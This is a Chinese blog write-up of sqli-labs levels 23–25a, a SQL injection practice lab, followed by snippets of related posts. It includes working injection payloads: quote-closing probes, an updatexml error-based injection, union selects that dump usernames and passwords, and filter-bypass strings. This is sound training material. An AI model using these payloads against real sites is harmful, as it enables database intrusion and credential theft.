sqli-labs 23-25a关闯关心得与思路

已于 2023-09-20 09:04:06 修改
阅读量235 收藏
点赞数
文章标签: php mysql 安全 sql
于 2022-04-18 11:43:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48294281/article/details/124245315
版权

1.根据源码可以看到:23关过滤了我们常用的注释符,#、--2.既然注释符被过滤,猜想如果构造闭合的话应该也可以执行插入的语句:

?id=1' order by 3 and'

 3.接着测试一下回显点,发现没有语句执行不正确,有在百度这个原因,还没找到:

 4.只是简单猜想是不是select函数的原因,换成报错的语句试一下,成功注入:

?id=1' and 1=(updatexml(1,concat(0x7e,(dtabase())),1)) and '

Blong~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs第二十三
m0_73248913的博客
02-19 260
sqli-labs第十二十三
sqli-labs23(基于get提交的过滤注释符的报错注入)
zyh1588的博客
01-15 1103
小白回顾sql靶场23
SQL-labs的第23——注释被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 208
这说明只有第一个和第二个位置是回显位,我们只需要在这两个位置进行注入就行。其实只有第二个是回显位,第一个也不是。但是如果是3个null,那么不会报错,这说明总共有3个注入位置。我们有添加了),但是仍然报错,这时我们怀疑注释符被屏蔽了。接下来,我们看一下,那个位置可以进行回显。我们猜测闭合方式是'。说明闭合方式是',并且注释符被屏蔽了。我们发现这里好像有回显,我们输入语句。使用报错注入也可以。
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三SQLi-LABS Less-23SQLi-LABS Less 23SQLiLABS Less23SQLi Less 23
sql-labs靶场第23-53新手通学习详解
m0_70483044的博客
11-10 1215
sql-labs 23-53新手教程~很早之前的文章忘记发了!!!有错误的地方欢迎指正!菜鸟选手。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs通(二十三)
qq_65950075的博客
05-08 478
这一是get类型当输入?id=1'时,出现报错信息,是由单引号闭合的但是输入?id=1'--+的时候,还是报错,说明我们的注释符可能被过滤处理了查看码源,确实是把注释符过滤了那我们还是根据语句构造?成功了判断字段数,这里不能用order by,只能不断往上加数字,不过一般都是3?说明是三个字段,只显示2号位,那我们就可以在这个位置进行注入?
sqli.labs靶场(23到28a
喜欢创作各种技术类文章,希望可以帮到你
02-01 1225
爆数据:1' and 1=2 union select 1,2,group_concat(username,':',password) from users where '1'='1。爆库:31') unionunion select select 1,database(),3 and ('1')=('1。爆库POC:1')%26(substr(database(),1,1)='s')%26('1')=('1。爆库:1' and 1=2 union select 1,2,database()'
sqli-labs第23~25
yuqnqi的博客
05-13 179
判断为get传参,类似于前10直接在URL上输入SQL语句判断为单引号闭合与前10不同的是,注释符无效,我们去看看源码发现注释符被正则表达式过滤且为id传参,单引号闭合所以想办法不用注释符就搞掉后面的单引号于是乎,构造语句?联合查询爆数据库?爆表?爆字段?爆值payload?当然也可以报错注入和其他方法。
sqli-labs靶场(23-38
weixin_51566481的博客
08-16 1162
sqli-labs,sql注入
基于Sqli-Labs靶场的SQL注入-23~24
Joker
01-04 1256
重点讲二次注入
sqli--labs 进阶篇 23_24
Lucky小小吴的小屋
01-30 556
直接登录进入,通过注册一个含有特殊字符的账号,再修改密码,从而修改掉原本的数据库中已存在的账号信息。到这里,自己没有什么思路,不知道怎么注入,看了下题目讲到二阶注入,猜测我们需要在。pass_change.php 登录成功后,有更新操作的处理。源码文件,重要的只有四个,下面就依次看一下源码文件的具体功能。更新账号密码时,账户信息没有过滤,是直接更新的,可以利用!注册一个新的,账号:admin’# ,密码:123。进一步确定自己的推论,源码中,存在过滤掉一些注释语句。
Sqli靶场23-->30
huohaowen的博客
02-05 1557
我:WAF我和你拼了!! WAF:Woof,Woof!!
sqli-labs-master第23
m_ing
05-17 1144
前言:从一开始我们是GET-----POST的路线来研究sql注入,这我们在从头早来研究GET请求方式。 http://192.168.89.139/sqli-labs-master/Less-23/ 我看到这个页面很是熟悉,提示我们输入id值作为参考。 我们加个’试一下 再来利用and来测试下,加入注释符#,编码成%23同样的报错 我们感到很好奇,还是看下原本代码 对注释符等都进行了过滤 突然一懵,我查阅了一些资料,只能采用单引号闭合的方法来绕过了,我们试试看! ?id 1=1’ and ‘1’=
sqlilabs(25a-26)
cuddlylm的博客
04-21 888
less-25a 过滤了or和and 变量$id的包裹方式从单引号变成了没有引号包裹,其余和25一样 less-26 第26会出现在apach下空格无法转义的问题,所以这里我们用docker做题 先起docker docker images docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs ifconfig 起完docker,先重置数据库再做题 阅读源码发现过滤了很多东西,而且是用正则过滤的 or and / – # 空格 和所有的
sqli-labs23
最新发布
05-26
sqli-labs23是一个用于学习SQL注入的实验平台,它包含了多个不同难度级别的SQL注入漏洞,并提供了相应的练习场景。在这个平台上,你可以通过对不同的漏洞进行攻击和练习来提高自己的SQL注入技能。 sqli-labs23中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值